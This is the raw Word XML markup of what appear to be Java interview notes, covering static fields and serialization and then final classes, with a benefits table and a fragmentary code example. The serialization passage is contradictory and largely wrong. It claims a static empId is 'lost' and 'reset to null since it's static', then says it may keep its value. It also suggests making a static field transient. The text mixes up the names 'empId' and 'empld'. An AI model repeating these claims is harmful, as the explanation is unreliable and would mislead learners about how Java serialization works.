      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be serialized because it is tied to the class, not the individual object instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C68BD9" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After deserialization, the value of the empId field will be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for that particular instance because it was not serialized. The empId will not be preserved across serialization and deserialization unless it is explicitly handled (e.g., through custom serialization or manually restoring the value after deserialization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEFCC84" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36" w:rsidP="00EB4E36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example of behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59859EC5" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Before Serialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628DBF5" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empId = "12345" (static)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3187" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empld = "E123" (instance field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7D4B2" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>After Serialization and Deserialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A78388" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empld will retain its value (e.g., "E123").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596DF490" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empId will be reset to its default value (null for String since it's static, or it may stay as it was set before the serialization if shared among instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C1166" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36" w:rsidP="00EB4E36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To ensure that empId is correctly handled across serialization and deserialization, you might need to manually manage it. For instance, you could mark the field transient and handle its restoration manually, or you could implement custom readObject and writeObject methods to control how static fields are serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7594A" w14:textId="7B918EC7" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="550D5563">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E6195" w14:textId="585B8157" w:rsidR="00A8268C" w:rsidRPr="00CE4B95" w:rsidRDefault="00B40963">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc196307494"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the final class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="2E958F58" w14:textId="3507DD2E" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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What is a final class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8E3A2" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="00BF7479">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>final class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be extended (inherited)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D900AFB" w14:textId="77777777" w:rsidR="00BF7479" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF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88751"/>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A021340" w14:textId="77777777" w:rsidR="00BF7479" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF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8875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lass code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FC701" w14:textId="2C49DB94" w:rsidR="00BF7479" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF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88751"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775704C3" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once a class is marked as final, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no other class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can subclass it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605EAC97" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0006045C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4EADC475">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B101185" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Why use a final cla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6"/>
        <w:gridCol w:w="6415"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="6FA645AA" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="227CEE0A" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="00164183">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC4BD7E" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="00164183">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="7A5456CB" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58CB821E" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Prevent Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="124BA061" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Avoid accidental or malicious subclassing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="1C8D2307" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1092945F" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6252C645" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Makes class behavior predictable and secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="33B15149" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8594D6" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Performance Optimization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38ABD904" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>JVM can make certain optimizations as it knows the class won't change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="7EB4D565" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34882766" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Encapsulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665C51A3" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Helps in creating immutable or well-contained utility classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A6B7534" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0006045C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7B56AC12">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C534A" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A86E729" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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935075"/>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curityManag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45EC4CB" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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9350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checkPermiss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2B082BB" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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9350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ermission granted."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893F163" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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9350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39D1B46" w14:textId="5184F611" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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935075"/>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2340ED63" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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0800161"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
